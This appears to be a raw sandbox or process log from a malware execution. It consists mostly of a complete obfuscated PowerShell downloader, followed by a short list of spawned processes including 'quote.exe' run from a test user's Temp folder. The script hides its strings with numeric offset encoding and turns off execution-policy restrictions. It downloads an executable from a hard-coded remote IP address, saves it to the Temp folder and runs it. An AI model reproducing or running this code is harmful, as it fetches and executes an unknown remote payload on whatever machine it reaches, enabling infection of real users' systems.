powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function nmGOxUPNNyx($ogSeqyEOxjSSyhC, $VyoAtZcdfQ){[IO.File]::WriteAllBytes($ogSeqyEOxjSSyhC, $VyoAtZcdfQ)};function LMAIKFAMR($ogSeqyEOxjSSyhC){if($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78926,78934,78934))) -eq $True){rundll32.exe $ogSeqyEOxjSSyhC }elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78938,78941,78875))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ogSeqyEOxjSSyhC}elseif($ogSeqyEOxjSSyhC.EndsWith((ZSaBwJjgTDUUHgu @(78872,78935,78941,78931))) -eq $True){misexec /qn /i $ogSeqyEOxjSSyhC}else{Start-Process $ogSeqyEOxjSSyhC}};function zRYMFYLDmOe($mDGmeSGhIkuwrqJtJZLw){$EfGJtgnGtNP = New-Object (ZSaBwJjgTDUUHgu @(78904,78927,78942,78872,78913,78927,78924,78893,78934,78931,78927,78936,78942));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$VyoAtZcdfQ = $EfGJtgnGtNP.DownloadData($mDGmeSGhIkuwrqJtJZLw);return $VyoAtZcdfQ};function ZSaBwJjgTDUUHgu($onRXg){$ZhZCNZYJEU=78826;$hWveCdbSaGxwsxez=$Null;foreach($nvVGJaTdTbAIieHwE in $onRXg){$hWveCdbSaGxwsxez+=[char]($nvVGJaTdTbAIieHwE-$ZhZCNZYJEU)};return $hWveCdbSaGxwsxez};function ZzRKOKlNVqQ(){$idobYOmcoyLGCSLad = $env:Temp + '\';$fuGeJBxNjgy = $idobYOmcoyLGCSLad + 'quote.exe'; if (Test-Path -Path $fuGeJBxNjgy){LMAIKFAMR $fuGeJBxNjgy;}Else{ $gLysEDfqNMMtOdk = zRYMFYLDmOe (ZSaBwJjgTDUUHgu @(78930,78942,78942,78938,78884,78873,78873,78875,78883,78882,78872,78876,78877,78872,78876,78874,78875,78872,78882,78883,78873,78945,78923,78940,78935,78873,78939,78943,78937,78942,78927,78872,78927,78946,78927));nmGOxUPNNyx $fuGeJBxNjgy $gLysEDfqNMMtOdk;LMAIKFAMR $fuGeJBxNjgy;};;;;}ZzRKOKlNVqQ;
2100quote.exe "C:\Users\test22\AppData\Local\Temp\quote.exe"
2272firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
2860explorer.exe C:\Windows\Explorer.EXE
1236